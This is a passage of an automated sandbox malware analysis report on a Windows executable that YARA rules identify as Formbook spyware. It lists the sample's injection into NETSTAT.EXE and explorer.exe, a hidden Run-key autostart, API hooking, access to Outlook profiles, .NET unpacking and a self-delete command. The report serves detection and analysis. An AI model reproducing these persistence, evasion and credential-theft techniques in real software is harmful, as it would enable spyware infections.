            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00E520A8 | 15_2_00E520A8
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DB20A0 | 15_2_00DB20A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00D9841F | 15_2_00D9841F
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00E41002 | 15_2_00E41002
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00D9D5E0 | 15_2_00D9D5E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DB2581 | 15_2_00DB2581
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00E51D55 | 15_2_00E51D55
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00D8F900 | 15_2_00D8F900
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00E52D07 | 15_2_00E52D07
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00D80D20 | 15_2_00D80D20
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DA4120 | 15_2_00DA4120
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00E52EF7 | 15_2_00E52EF7
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00E522AE | 15_2_00E522AE
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DA6E30 | 15_2_00DA6E30
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00E51FF1 | 15_2_00E51FF1
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00E4DBD2 | 15_2_00E4DBD2
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DBEBB0 | 15_2_00DBEBB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00E52B28 | 15_2_00E52B28
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_003ED364 | 15_2_003ED364
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_003D2D90 | 15_2_003D2D90
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_003D2D87 | 15_2_003D2D87
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_003D9E20 | 15_2_003D9E20
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_003D9E1B | 15_2_003D9E1B
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_003ECEE6 | 15_2_003ECEE6
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_003EDED5 | 15_2_003EDED5
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_003D2FB0 | 15_2_003D2FB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: String function: 00D8B150 appears 35 times
            Source: CN03716-2020.exe | Binary or memory string: OriginalFilename vs CN03716-2020.exe
            Source: CN03716-2020.exe, 00000000.00000002.255862873.0000000006F80000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameButterFly.dll< vs CN03716-2020.exe
            Source: CN03716-2020.exe, 00000000.00000002.246609407.0000000002788000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameEminem.dll< vs CN03716-2020.exe
            Source: CN03716-2020.exe, 00000000.00000000.217694353.0000000000287000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameIG12.exe. vs CN03716-2020.exe
            Source: CN03716-2020.exe | Binary or memory string: OriginalFilename vs CN03716-2020.exe
            Source: CN03716-2020.exe, 00000001.00000002.241053176.0000000000147000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameIG12.exe. vs CN03716-2020.exe
            Source: CN03716-2020.exe | Binary or memory string: OriginalFilename vs CN03716-2020.exe
            Source: CN03716-2020.exe, 00000002.00000000.242165279.00000000003E7000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameIG12.exe. vs CN03716-2020.exe
            Source: CN03716-2020.exe | Binary or memory string: OriginalFilename vs CN03716-2020.exe
            Source: CN03716-2020.exe, 00000003.00000002.298291699.00000000018DF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs CN03716-2020.exe
            Source: CN03716-2020.exe, 00000003.00000002.296538583.00000000009F7000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameIG12.exe. vs CN03716-2020.exe
            Source: CN03716-2020.exe, 00000003.00000002.297720210.0000000001550000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamenetstat.exej% vs CN03716-2020.exe
            Source: CN03716-2020.exe | Binary or memory string: OriginalFilenameIG12.exe. vs CN03716-2020.exe
            Source: 00000003.00000002.297656671.00000000014F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.297656671.00000000014F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.487540678.0000000000840000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.487540678.0000000000840000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.297494662.00000000011A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.297494662.00000000011A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.246902905.0000000003729000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.246902905.0000000003729000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.296261500.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.296261500.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.487662133.0000000000870000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.487662133.0000000000870000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.486412389.00000000003D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.486412389.00000000003D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.CN03716-2020.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.CN03716-2020.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.CN03716-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.CN03716-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: CN03716-2020.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: CN03716-2020.exe, Frupal/End.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 0.0.CN03716-2020.exe.250000.0.unpack, Frupal/End.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 0.2.CN03716-2020.exe.250000.0.unpack, Frupal/End.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 1.2.CN03716-2020.exe.110000.0.unpack, Frupal/End.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 1.0.CN03716-2020.exe.110000.0.unpack, Frupal/End.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: 2.2.CN03716-2020.exe.3b0000.0.unpack, Frupal/End.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@11/4@5/2
            Source: C:\Users\user\Desktop\CN03716-2020.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CN03716-2020.exe.log
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6280:120:WilError_01
            Source: CN03716-2020.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\explorer.exe | File read: C:\Users\user\AppData\Roaming\0N65N-AB\0N6logri.ini
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: CN03716-2020.exe | Virustotal: Detection: 20%
            Source: CN03716-2020.exe | ReversingLabs: Detection: 25%
            Source: unknown | Process created: C:\Users\user\Desktop\CN03716-2020.exe 'C:\Users\user\Desktop\CN03716-2020.exe'
            Source: unknown | Process created: C:\Users\user\Desktop\CN03716-2020.exe C:\Users\user\Desktop\CN03716-2020.exe
            Source: unknown | Process created: C:\Users\user\Desktop\CN03716-2020.exe C:\Users\user\Desktop\CN03716-2020.exe
            Source: unknown | Process created: C:\Users\user\Desktop\CN03716-2020.exe C:\Users\user\Desktop\CN03716-2020.exe
            Source: unknown | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
            Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\CN03716-2020.exe'
            Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process created: C:\Users\user\Desktop\CN03716-2020.exe C:\Users\user\Desktop\CN03716-2020.exe
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process created: C:\Users\user\Desktop\CN03716-2020.exe C:\Users\user\Desktop\CN03716-2020.exe
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process created: C:\Users\user\Desktop\CN03716-2020.exe C:\Users\user\Desktop\CN03716-2020.exe
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\CN03716-2020.exe'
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | File written: C:\Users\user\AppData\Roaming\0N65N-AB\0N6logri.ini
            Source: C:\Users\user\Desktop\CN03716-2020.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: CN03716-2020.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: CN03716-2020.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
            Source: CN03716-2020.exe | Static file information: File size 1524736 > 1048576
            Source: CN03716-2020.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x173800
            Source: CN03716-2020.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: netstat.pdbGCTL | source: CN03716-2020.exe, 00000003.00000002.297720210.0000000001550000.00000040.00000001.sdmp
            Source: Binary string: netstat.pdb | source: CN03716-2020.exe, 00000003.00000002.297720210.0000000001550000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP | source: CN03716-2020.exe, 00000003.00000002.297933612.000000000174F000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000F.00000002.489598319.0000000000E7F000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb | source: CN03716-2020.exe, 00000003.00000002.297933612.000000000174F000.00000040.00000001.sdmp, NETSTAT.EXE

            Data Obfuscation:

            .NET source code contains potential unpacker
            Source: CN03716-2020.exe, Frupal/End.cs | .Net Code: Core System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.0.CN03716-2020.exe.250000.0.unpack, Frupal/End.cs | .Net Code: Core System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.2.CN03716-2020.exe.250000.0.unpack, Frupal/End.cs | .Net Code: Core System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.2.CN03716-2020.exe.110000.0.unpack, Frupal/End.cs | .Net Code: Core System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.0.CN03716-2020.exe.110000.0.unpack, Frupal/End.cs | .Net Code: Core System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.2.CN03716-2020.exe.3b0000.0.unpack, Frupal/End.cs | .Net Code: Core System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.0.CN03716-2020.exe.3b0000.0.unpack, Frupal/End.cs | .Net Code: Core System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.CN03716-2020.exe.9c0000.0.unpack, Frupal/End.cs | .Net Code: Core System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.2.CN03716-2020.exe.9c0000.1.unpack, Frupal/End.cs | .Net Code: Core System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 0_2_06F25605 push es; iretd | 0_2_06F25618
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 0_2_06F257A3 push es; iretd | 0_2_06F257E4
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 0_2_06F25491 push es; ret | 0_2_06F2552C
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 0_2_06F25491 push es; retf | 0_2_06F255C4
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 0_2_06F25491 push es; retf | 0_2_06F25604
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 0_2_06F255C5 push es; retf | 0_2_06F25604
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 0_2_06F2552D push es; retf | 0_2_06F255C4
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 0_2_06F253E6 push es; ret | 0_2_06F253E8
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 0_2_06F253A1 push es; retf | 0_2_06F253D4
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 0_2_06F258F5 push es; iretd | 0_2_06F258F8
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 0_2_06F2598F push es; iretd | 0_2_06F25A58
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 3_2_0041796E push edx; iretd | 3_2_00417983
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 3_2_0041DC4A push es; iretd | 3_2_0041DC4B
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 3_2_0041CDF5 push eax; ret | 3_2_0041CE48
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 3_2_0041CE42 push eax; ret | 3_2_0041CE48
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 3_2_0041CE4B push eax; ret | 3_2_0041CEB2
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 3_2_0041CEAC push eax; ret | 3_2_0041CEB2
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DDD0D1 push ecx; ret | 15_2_00DDD0E4
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_003E796E push edx; iretd | 15_2_003E7983
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_003EDC4A push es; iretd | 15_2_003EDC4B
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_003ECDF5 push eax; ret | 15_2_003ECE48
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_003ECE4B push eax; ret | 15_2_003ECEB2
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_003ECE42 push eax; ret | 15_2_003ECE48
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_003ECEAC push eax; ret | 15_2_003ECEB2
            Source: initial sample | Static PE information: section name: .text entropy: 7.18250412051

            Boot Survival:

            Creates an undocumented autostart registry key
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C6QLSB

            Hooking and other Techniques for Hiding and Protection:

            Modifies the prolog of user mode functions (user mode inline hooks)
            Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE0
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Process information set: NOOPENFILEERRORBOX